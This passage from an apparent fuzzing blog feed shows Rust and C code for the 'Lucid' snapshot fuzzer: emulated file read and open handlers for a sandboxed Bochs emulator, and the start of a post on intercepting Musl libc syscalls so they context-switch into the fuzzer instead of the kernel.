        <span class="k">self</span><span class="py">.files</span><span class="nf">.iter_mut</span><span class="p">()</span><span class="nf">.find</span><span class="p">(|</span><span class="n">file</span><span class="p">|</span> <span class="n">file</span><span class="py">.fd</span> <span class="o">==</span> <span class="n">fd</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">File</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">fd</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span>            <span class="c1">// The file-descriptor Bochs has for this file</span>
    <span class="k">pub</span> <span class="n">path</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span>       <span class="c1">// The file-path for this file</span>
    <span class="k">pub</span> <span class="n">contents</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">u8</span><span class="o">&gt;</span><span class="p">,</span>  <span class="c1">// The actual file contents</span>
    <span class="k">pub</span> <span class="n">cursor</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>      <span class="c1">// The current cursor in the file</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So when Bochs asks to <code class="language-plaintext highlighter-rouge">read</code> a file and provides the <code class="language-plaintext highlighter-rouge">fd</code>, we just check the <code class="language-plaintext highlighter-rouge">FileTable</code> for the correct file and then read its contents from the <code class="language-plaintext highlighter-rouge">File::contents</code> buffer and then update the <code class="language-plaintext highlighter-rouge">cursor</code> struct member to keep track of where in the file our current offset is.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// read</span>
        <span class="mi">0x0</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Check to make sure we have the requested file-descriptor</span>
            <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> <span class="o">=</span> <span class="n">context</span><span class="py">.files</span><span class="nf">.get_file</span><span class="p">(</span><span class="n">a1</span> <span class="k">as</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">else</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Non-existent file fd: {}"</span><span class="p">,</span> <span class="n">a1</span><span class="p">);</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">NoFile</span><span class="p">);</span>
            <span class="p">};</span>

            <span class="c1">// Now we need to make sure the buffer passed to read isn't NULL</span>
            <span class="k">let</span> <span class="n">buf_p</span> <span class="o">=</span> <span class="n">a2</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">;</span>
            <span class="k">if</span> <span class="n">buf_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="n">context</span><span class="py">.tls.errno</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">EINVAL</span><span class="p">;</span>
                <span class="k">return</span> <span class="o">-</span><span class="mi">1_i64</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Adjust read size if necessary</span>
            <span class="k">let</span> <span class="n">length</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">cmp</span><span class="p">::</span><span class="nf">min</span><span class="p">(</span><span class="n">a3</span><span class="p">,</span> <span class="n">file</span><span class="py">.contents</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">file</span><span class="py">.cursor</span><span class="p">);</span>

            <span class="c1">// Copy the contents over to the buffer</span>
            <span class="k">unsafe</span> <span class="p">{</span> 
                <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">copy</span><span class="p">(</span>
                    <span class="n">file</span><span class="py">.contents</span><span class="nf">.as_ptr</span><span class="p">()</span><span class="nf">.add</span><span class="p">(</span><span class="n">file</span><span class="py">.cursor</span><span class="p">),</span>    <span class="c1">// src</span>
                    <span class="n">buf_p</span><span class="p">,</span>                                      <span class="c1">// dst</span>
                    <span class="n">length</span><span class="p">);</span>                                    <span class="c1">// len</span>
            <span class="p">}</span>

            <span class="c1">// Adjust the file cursor</span>
            <span class="n">file</span><span class="py">.cursor</span> <span class="o">+=</span> <span class="n">length</span><span class="p">;</span>

            <span class="c1">// Success</span>
            <span class="n">length</span> <span class="k">as</span> <span class="nb">u64</span>
        <span class="p">},</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">open</code> calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// open</span>
        <span class="mi">0x2</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Get pointer to path string we're trying to open</span>
            <span class="k">let</span> <span class="n">path_p</span> <span class="o">=</span> <span class="n">a1</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_char</span><span class="p">;</span>

            <span class="c1">// Make sure it's not NULL</span>
            <span class="k">if</span> <span class="n">path_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">NullPath</span><span class="p">);</span>
            <span class="p">}</span>            

            <span class="c1">// Create c_str from pointer</span>
            <span class="k">let</span> <span class="n">c_str</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ffi</span><span class="p">::</span><span class="nn">CStr</span><span class="p">::</span><span class="nf">from_ptr</span><span class="p">(</span><span class="n">path_p</span><span class="p">)</span> <span class="p">};</span>

            <span class="c1">// Create Rust str from c_str</span>
            <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">path_str</span><span class="p">)</span> <span class="o">=</span> <span class="n">c_str</span><span class="nf">.to_str</span><span class="p">()</span> <span class="k">else</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">InvalidPathStr</span><span class="p">);</span>
            <span class="p">};</span>

            <span class="c1">// Validate permissions</span>
            <span class="k">if</span> <span class="n">a2</span> <span class="k">as</span> <span class="nb">i32</span> <span class="o">!=</span> <span class="mi">32768</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Unhandled file permissions: {}"</span><span class="p">,</span> <span class="n">a2</span><span class="p">);</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">Syscall</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// Open the file</span>
            <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">context</span><span class="py">.files</span><span class="nf">.open</span><span class="p">(</span><span class="n">path_str</span><span class="p">);</span>
            <span class="k">if</span> <span class="n">fd</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
                <span class="nd">println!</span><span class="p">(</span><span class="s">"Non-existent file path: {}"</span><span class="p">,</span> <span class="n">path_str</span><span class="p">);</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">NoFile</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// Success</span>
            <span class="n">fd</span><span class="nf">.unwrap</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u64</span>
        <span class="p">},</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Attempt to open a file</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">open</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">path</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">i32</span><span class="p">,</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Try to find the requested path</span>
        <span class="k">for</span> <span class="n">file</span> <span class="k">in</span> <span class="k">self</span><span class="py">.files</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">file</span><span class="py">.path</span> <span class="o">==</span> <span class="n">path</span> <span class="p">{</span>
                <span class="k">return</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">file</span><span class="py">.fd</span><span class="p">);</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="c1">// We didn't find the file</span>
        <span class="nf">Err</span><span class="p">(())</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.</p>

<h2 id="conclusion">Conclusion</h2>
<p>The work continues on the fuzzer, I’m still having a blast implementing it, special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and it get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately, that should be really fun, until then!</p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Background]]></summary></entry><entry><title type="html">Fuzzer Development 2: Sandboxing Syscalls</title><link href="https://h0mbre.github.io/Lucid_Context_Switching/" rel="alternate" type="text/html" title="Fuzzer Development 2: Sandboxing Syscalls" /><published>2024-02-17T00:00:00+00:00</published><updated>2024-02-17T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Context_Switching</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Context_Switching/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up <a href="https://h0mbre.github.io/New_Fuzzer_Project/">here</a>. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.</p>

<p>This fuzzer was conceived of and implemented originally by <a href="https://twitter.com/gamozolabs">Brandon Falk</a>.</p>

<p>There will be no repo changes with this post.</p>

<h2 id="syscalls">Syscalls</h2>
<p><a href="https://wiki.osdev.org/System_Calls">Syscalls</a> are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers, reading/writing memory, your process is executing in user-mode within your processes’ virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode go to kernel-mode and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, that way once the kernel is done with your request, it can return gracefully to executing your user-mode process.</p>

<p>Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing it’s thing, reading/writing memory, doing arithmetic etc, but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:</p>

<ol>
  <li>recognize that Bochs is trying to syscall, this isn’t always easy to do weirdly</li>
  <li>intercept execution and redirect to the appropriate code path</li>
  <li>save Bochs’ execution state</li>
  <li>execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel</li>
  <li>return gracefully to Bochs by restoring its state</li>
</ol>

<h2 id="c-library">C Library</h2>
<p>Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library instead, and its these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance if you use the C library function for <code class="language-plaintext highlighter-rouge">open</code>, you’re not directly making a syscall, you’re calling into the library’s <code class="language-plaintext highlighter-rouge">open</code> function and that function is the one emitting a <code class="language-plaintext highlighter-rouge">syscall</code> instruction that actually peforms the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the <code class="language-plaintext highlighter-rouge">open</code> function and don’t have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.</p>

<p>This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to <em>intercept</em> these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()
</code></pre></div></div>

<h2 id="musl">Musl</h2>
<p><a href="https://musl.libc.org/">Musl</a> is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc which is a monstrosity an affront to God. Importantly, Musl is reputationally great for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.</p>

<p>In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.</p>

<h2 id="baby-steps">Baby Steps</h2>
<p>Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;lucid.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Argument count: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argc</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Args:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">argc</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"   -%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="kt">size_t</span> <span class="n">iters</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Test alive!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">iters</span><span class="o">++</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">iters</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span>
    <span class="p">}</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"g_lucid_ctx: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">g_lucid_ctx</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The program will just tell us it’s argument count, each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?</p>

<h2 id="execution-context-tracking">Execution Context Tracking</h2>
<p>Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not its running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs so we need a vehicle do that.</p>

<p>What I’ve done is I’ve just created my own header file and placed it in Musl called <code class="language-plaintext highlighter-rouge">lucid.h</code>. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a <code class="language-plaintext highlighter-rouge">lucid_ctx</code> data structure, and we’ve also created a global instance of one called <code class="language-plaintext highlighter-rouge">g_lucid_ctx</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// An execution context definition that we use to switch contexts between the</span>
<span class="c1">// fuzzer and Bochs. This should contain all of the information we need to track</span>
<span class="c1">// all of the mutable state between snapshots that we need such as file data.</span>
<span class="c1">// This has to be consistent with LucidContext in context.rs</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">lucid_ctx</span> <span class="p">{</span>
    <span class="c1">// This must always be the first member of this struct</span>
    <span class="kt">size_t</span> <span class="n">exit_handler</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">save_inst</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">save_size</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">lucid_save_area</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">bochs_save_area</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">register_bank</span> <span class="n">register_bank</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">magic</span><span class="p">;</span>
<span class="p">}</span> <span class="n">lucid_ctx_t</span><span class="p">;</span>

<span class="c1">// Pointer to the global execution context, if running inside Lucid, this will</span>
<span class="c1">// point to the a struct lucid_ctx_t inside the Fuzzer </span>
<span class="n">lucid_ctx_t</span> <span class="o">*</span><span class="n">g_lucid_ctx</span><span class="p">;</span>
</code></pre></div></div>

<h2 id="program-start-under-lucid">Program Start Under Lucid</h2>
<p>So in Lucid’s main function right now we do the following:</p>
<ul>
  <li>Load Bochs</li>
  <li>Create an execution context</li>
  <li>Jump to Bochs’ entry point and start executing</li>
</ul>

<p>When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called <code class="language-plaintext highlighter-rouge">_dlstart_c</code> located in the source file <code class="language-plaintext highlighter-rouge">dlstart.c</code>. Right now, we create that global execution context in Lucid on the heap, and then we pass that address in arbitrarily chosen <code class="language-plaintext highlighter-rouge">r15</code>. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">start_bochs</span><span class="p">(</span><span class="n">bochs</span><span class="p">:</span> <span class="n">Bochs</span><span class="p">,</span> <span class="n">context</span><span class="p">:</span> <span class="nb">Box</span><span class="o">&lt;</span><span class="n">LucidContext</span><span class="o">&gt;</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// rdx: we have to clear this register as the ABI specifies that exit</span>
    <span class="c1">// hooks are set when rdx is non-null at program start</span>
    <span class="c1">//</span>
    <span class="c1">// rax: arbitrarily used as a jump target to the program entry</span>
    <span class="c1">//</span>
    <span class="c1">// rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we</span>
    <span class="c1">// have to manually set it with a `mov`</span>
    <span class="c1">//</span>
    <span class="c1">// r15: holds a pointer to the execution context, if this value is non-</span>
    <span class="c1">// null, then Bochs learns at start time that it is running under Lucid</span>
    <span class="c1">//</span>
    <span class="c1">// We don't really care about execution order as long as we specify clobbers</span>
    <span class="c1">// with out/lateout, that way the compiler doesn't allocate a register we </span>
    <span class="c1">// then immediately clobber</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"xor rdx, rdx"</span><span class="p">,</span>
            <span class="s">"mov rsp, {0}"</span><span class="p">,</span>
            <span class="s">"mov r15, {1}"</span><span class="p">,</span>
            <span class="s">"jmp rax"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.rsp</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="nn">Box</span><span class="p">::</span><span class="nf">into_raw</span><span class="p">(</span><span class="n">context</span><span class="p">),</span>
            <span class="k">in</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.entry</span><span class="p">,</span>
            <span class="nf">lateout</span><span class="p">(</span><span class="s">"rax"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>   <span class="c1">// Clobber (inout so no conflict with in)</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"rdx"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
            <span class="nf">out</span><span class="p">(</span><span class="s">"r15"</span><span class="p">)</span> <span class="n">_</span><span class="p">,</span>       <span class="c1">// Clobber</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So when we jump to Bochs entry point having come from Lucid, <code class="language-plaintext highlighter-rouge">r15</code> should hold the address of the execution context. In <code class="language-plaintext highlighter-rouge">_dlstart_c</code>, we can check <code class="language-plaintext highlighter-rouge">r15</code> and act accordingly. Here are those additions I made to Musl’s start routine:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">hidden</span> <span class="kt">void</span> <span class="nf">_dlstart_c</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="n">sp</span><span class="p">,</span> <span class="kt">size_t</span> <span class="o">*</span><span class="n">dynv</span><span class="p">)</span>
<span class="p">{</span>
	<span class="c1">// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h</span>
	<span class="c1">// so we can just do this here. That function logic clobbers only a few</span>
	<span class="c1">// registers, so we can have the Lucid loader pass the address of the </span>
	<span class="c1">// Lucid context in r15, this is obviously not the cleanest solution but</span>
	<span class="c1">// it works for our purposes</span>
	<span class="kt">size_t</span> <span class="n">r15</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span><span class="p">(</span>
		<span class="s">"mov %%r15, %0"</span> <span class="o">:</span> <span class="s">"=r"</span><span class="p">(</span><span class="n">r15</span><span class="p">)</span>
	<span class="p">);</span>

	<span class="c1">// If r15 was not 0, set the global context address for the g_lucid_ctx that</span>
	<span class="c1">// is in the Rust fuzzer</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">r15</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">g_lucid_ctx</span> <span class="o">=</span> <span class="p">(</span><span class="n">lucid_ctx_t</span> <span class="o">*</span><span class="p">)</span><span class="n">r15</span><span class="p">;</span>

		<span class="c1">// We have to make sure this is true, we rely on this</span>
		<span class="k">if</span> <span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">g_lucid_ctx</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">exit_handler</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">__asm__</span> <span class="n">__volatile__</span><span class="p">(</span><span class="s">"int3"</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="c1">// We didn't get a g_lucid_ctx, so we can just run normally</span>
	<span class="k">else</span> <span class="p">{</span>
		<span class="n">g_lucid_ctx</span> <span class="o">=</span> <span class="p">(</span><span class="n">lucid_ctx_t</span> <span class="o">*</span><span class="p">)</span><span class="mi">0</span><span class="p">;</span>
	<span class="p">}</span>
</code></pre></div></div>

<p>When this function is called, <code class="language-plaintext highlighter-rouge">r15</code> remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called <code class="language-plaintext highlighter-rouge">r15</code> and check it for data. If it has data, we set the global context variable to the address in <code class="language-plaintext highlighter-rouge">r15</code>; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.</p>

<h2 id="lobotomizing-musl-syscalls">Lobotomizing Musl Syscalls</h2>
<p>Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in <code class="language-plaintext highlighter-rouge">arch/x86_64/syscall_arch.h</code>. They are organized by how many arguments the syscall takes:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall0</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall1</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall2</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">)</span>
						  <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">__inline</span> <span class="kt">long</span> <span class="nf">__syscall3</span><span class="p">(</span><span class="kt">long</span> <span class="n">n</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">long</span> <span class="n">a3</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
	<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"syscall"</span> <span class="o">:</span> <span class="s">"=a"</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a"</span><span class="p">(</span><span class="n">n</span><span class="p">),</span> <span class="s">"D"</span><span class="p">(</span><span class="n">a1</span><span class="p">),</span> <span class="s">"S"</span><span class="p">(</span><span class="n">a2</span><span class="p">),</span>
						  <span class="s">"d"</span><span class="p">(</span><span class="n">a3</span><span class="p">)</span> <span class="o">:</span> <span class="s">"rcx"</span><span class="p">,</span> <span class="s">"r11"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

